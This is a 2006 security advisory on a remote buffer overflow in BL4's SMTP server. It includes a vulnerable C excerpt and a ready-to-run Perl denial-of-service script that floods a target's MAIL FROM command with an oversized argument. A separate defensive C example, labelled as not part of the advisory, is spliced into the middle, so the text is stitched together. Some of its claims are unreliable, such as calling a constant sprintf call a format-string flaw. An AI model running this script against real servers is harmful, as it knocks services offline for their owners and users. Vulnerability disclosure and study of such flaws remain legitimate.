---------------------------------------------------------------------------
[ECHO_ADV_30$2006] BL4's SMTP server Buffer Overflow Vulnerability
---------------------------------------------------------------------------
Author : Dedi Dwianto
Date : April, 27th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : BL4's SMTP server
version : < 0.1.5
URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :
BL4's SMTP server is an inbound only SMTP server.
It currently uses hardcoded values for handling email.
The SMTP server puts the incoming email into various text files.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~~
BL4's SMTP server is prone to a flaw that can allow a remote attacker to
cause a denial of service or to execute arbitrary code.
The vulnerability is due to a buffer overflow in the SMTP service.
A remote attacker can repeatedly send more than 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server.
------------------think.c-----------------------------------
...........
{
/* reset the per-connection state for this slave */
slaveEmail[x]->isData = 0;
slaveEmail[x]->emailFrom = 0;
slaveEmail[x]->emailTo = 0;
free(buffer);
/* fixed 12-byte reply buffer; the reply itself is 8 bytes plus NUL */
buffer = malloc(sizeof(char) * 12);
sprintf(buffer, "250 OK\r\n");
return buffer;
}
free(buffer);
.............
/* the client-supplied EHLO argument is stored without a length check */
slaveEmail[x]->EHLO = buffer;
slaveEmail[x]->EHLOtrue = 1;
buffer = malloc(sizeof(char) * 12);
sprintf(buffer, "250 OK\r\n");
return buffer;
-----------------------------------------------------------
--
sprintf(buffer, "250 OK\r\n");
--
Vulnerable to format strings.
--
free(buffer);
buffer = malloc(sizeof(char) * 12);
--
Vulnerable to buffer overflow.
An attacker can execute arbitrary code here.
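As an added example (not BL4's code and not part of the advisory), the following C handler shows the checks the think.c excerpt above is missing: the command line is measured against the RFC 5321 command-line limit before anything is stored, the HELO/EHLO and MAIL FROM arguments are copied into fixed-size fields only when they fit, and the reply is written with snprintf into a caller-sized buffer instead of sprintf into a 12-byte malloc. The struct layout, limits and function names are assumptions for illustration; reply_for_mail_from_len builds a constructed MAIL FROM argument of a chosen length, in the spirit of the PoC's oversized input, and returns the reply code the handler produces for it.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

/* Added example, not BL4's code: bounded handling of SMTP command arguments. */

#define SMTP_MAX_LINE 512 /* RFC 5321 4.5.3.1.4: command line incl. CRLF (assumed limit) */
#define SMTP_MAX_PATH 256 /* RFC 5321 4.5.3.1.3: reverse/forward path (assumed limit) */
#define REPLY_LEN 64      /* hypothetical reply buffer size chosen by the caller */

/* Hypothetical per-connection state, loosely mirroring the excerpt's slaveEmail fields. */
struct session {
    char ehlo[SMTP_MAX_LINE];
    char mail_from[SMTP_MAX_PATH];
    int ehlo_seen;
};

/* Copies src into dst[cap] only when it fits with its NUL. Returns 1 on success, 0 if too long. */
static int copy_bounded(char *dst, size_t cap, const char *src) {
    size_t n = strlen(src);
    if (n >= cap)
        return 0;
    memcpy(dst, src, n + 1);
    return 1;
}

/* Handles one command line (CRLF already stripped). Writes the reply with a constant
 * format string into reply[reply_cap] and returns the numeric SMTP reply code. */
int handle_command(struct session *s, const char *line, char *reply, size_t reply_cap) {
    /* Reject the whole line before touching any state if it exceeds the line limit. */
    if (strlen(line) + 2 > SMTP_MAX_LINE) {
        snprintf(reply, reply_cap, "500 Line too long\r\n");
        return 500;
    }
    if (strncasecmp(line, "EHLO ", 5) == 0 || strncasecmp(line, "HELO ", 5) == 0) {
        if (!copy_bounded(s->ehlo, sizeof s->ehlo, line + 5)) {
            snprintf(reply, reply_cap, "501 Argument too long\r\n");
            return 501;
        }
        s->ehlo_seen = 1;
        snprintf(reply, reply_cap, "250 OK\r\n");
        return 250;
    }
    if (strncasecmp(line, "MAIL FROM:", 10) == 0) {
        if (!copy_bounded(s->mail_from, sizeof s->mail_from, line + 10)) {
            snprintf(reply, reply_cap, "501 Path too long\r\n");
            return 501;
        }
        snprintf(reply, reply_cap, "250 OK\r\n");
        return 250;
    }
    snprintf(reply, reply_cap, "500 Unrecognized command\r\n");
    return 500;
}

/* Constructs "MAIL FROM:" followed by n bytes of 'j' (a made-up input, like the PoC's
 * repeated string) and returns the reply code the bounded handler gives it. */
int reply_for_mail_from_len(size_t n) {
    struct session s = {0};
    char reply[REPLY_LEN];
    char *line = malloc(10 + n + 1);
    if (!line)
        return -1;
    memcpy(line, "MAIL FROM:", 10);
    memset(line + 10, 'j', n);
    line[10 + n] = '\0';
    int code = handle_command(&s, line, reply, sizeof reply);
    free(line);
    return code;
}

int main(void) {
    printf("20-byte path   -> %d\n", reply_for_mail_from_len(20));   /* 250 */
    printf("300-byte path  -> %d\n", reply_for_mail_from_len(300));  /* 501 */
    printf("2300-byte path -> %d\n", reply_for_mail_from_len(2300)); /* 500 */
    return 0;
}
```

The two limits work as layers: an argument longer than the whole command line is refused before any copy, and an argument that fits the line but not the path field is refused by the bounded copy, so neither path ever writes past a fixed buffer.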
PoC:
~~~~~~~~~~~~
#!/usr/bin/perl
use IO::Socket;
use Socket;
my($socket) = "";
# expects [target] [port]
if($#ARGV < 1 || $#ARGV > 2) {usage()}
$adr = $ARGV[0];
$prt = $ARGV[1];
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: can't connect to $adr:$prt\n";
print " -- Connecting To SMTP server at $adr port $prt ... \n";
sleep(1);
print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";
sleep(1);
# oversized MAIL FROM argument (far beyond the 2100 bytes noted above)
print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";
sleep(1);
printf("[+]Ok!\n");
printf("[+]Crash service.....\n");
printf("[~]Done.\n");
close($socket);
sub usage()
{
print "\n=========================================\r\n";
print " BL4's SMTP server Remote DOS \r\n";
print "=========================================\r\n";
print " Bug Found by Dedi Dwianto \r\n";
print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
print " Echo Security Research Group \r\n";
print "=========================================\r\n";
print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
exit();
}
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker (at) yahoogroups (dot) com [email concealed]
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------